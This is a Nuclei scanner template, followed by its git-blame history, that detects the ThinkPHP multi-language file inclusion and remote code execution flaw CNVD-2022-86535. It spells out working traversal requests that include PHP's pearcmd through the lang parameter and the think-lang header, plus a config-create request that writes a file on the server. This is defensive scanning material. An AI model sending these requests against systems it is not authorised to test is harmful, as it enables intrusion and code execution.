nuclei-templates/http/cnvd/2022/CNVD-2022-86535.yaml

id: CNVD-2022-86535

info:
  name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)
  author: arliya,ritikchaddha
  severity: high
  description: |
    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
  reference:
    - https://cn-sec.com/archives/1465289.html
    - https://blog.csdn.net/qq_60614981/article/details/128724640
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
  metadata:
    verified: true
    max-request: 3
  tags: cnvd,cnvd2022,thinkphp,rce

http:
  - raw:
      - |
        GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1
        Host: {{Hostname}}
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        think-lang: ../../../../../usr/local/php/pearcmd
      - |
        GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: set_cookie
        words:
          - "think_lang=..%2F..%2F..%2F..%2F"

      - type: word
        part: body_3
        words:
          - "CONFIGURATION"
          - "Successfully created"
        condition: and

# digest: 4a0a00473045022061630427dd72328900e8eb0f4d67c91f2c826690524c1c973c1cfe5b64400926022100c6c345fd5fbcc3038eaec942397faf5b9658b328bbb421f95eb3d2146d7f0cd7:922c64590222798bb761d5b6d8e72950
re-write template 2023-06-19 10:41:59 +00:00			`id: CNVD-2022-86535`

			`info:`
Update CNVD-2022-86535.yaml 2023-07-05 06:14:31 +00:00			`name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE)`
re-write template 2023-06-19 10:41:59 +00:00			`author: arliya,ritikchaddha`
			`severity: high`
			`description: \|`
			`ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.`
			`reference:`
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`- https://cn-sec.com/archives/1465289.html`
			`- https://blog.csdn.net/qq_60614981/article/details/128724640`
re-write template 2023-06-19 10:41:59 +00:00			`- https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535`
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`metadata:`
			`verified: true`
templateman update 2023-10-14 11:27:55 +00:00			`max-request: 3`
re-write template 2023-06-19 10:41:59 +00:00			`tags: cnvd,cnvd2022,thinkphp,rce`

			`http:`
			`- raw:`
			`- \|`
			`GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`GET / HTTP/1.1`
			`Host: {{Hostname}}`
			`think-lang: ../../../../../usr/local/php/pearcmd`
			`- \|`
			`GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: or`
			`matchers:`
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`- type: word`
			`part: set_cookie`
			`words:`
			`- "think_lang=..%2F..%2F..%2F..%2F"`
re-write template 2023-06-19 10:41:59 +00:00
added ref & metadata, fix lint 2023-06-19 10:46:36 +00:00			`- type: word`
			`part: body_3`
			`words:`
			`- "CONFIGURATION"`
			`- "Successfully created"`
			`condition: and`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022061630427dd72328900e8eb0f4d67c91f2c826690524c1c973c1cfe5b64400926022100c6c345fd5fbcc3038eaec942397faf5b9658b328bbb421f95eb3d2146d7f0cd7:922c64590222798bb761d5b6d8e72950`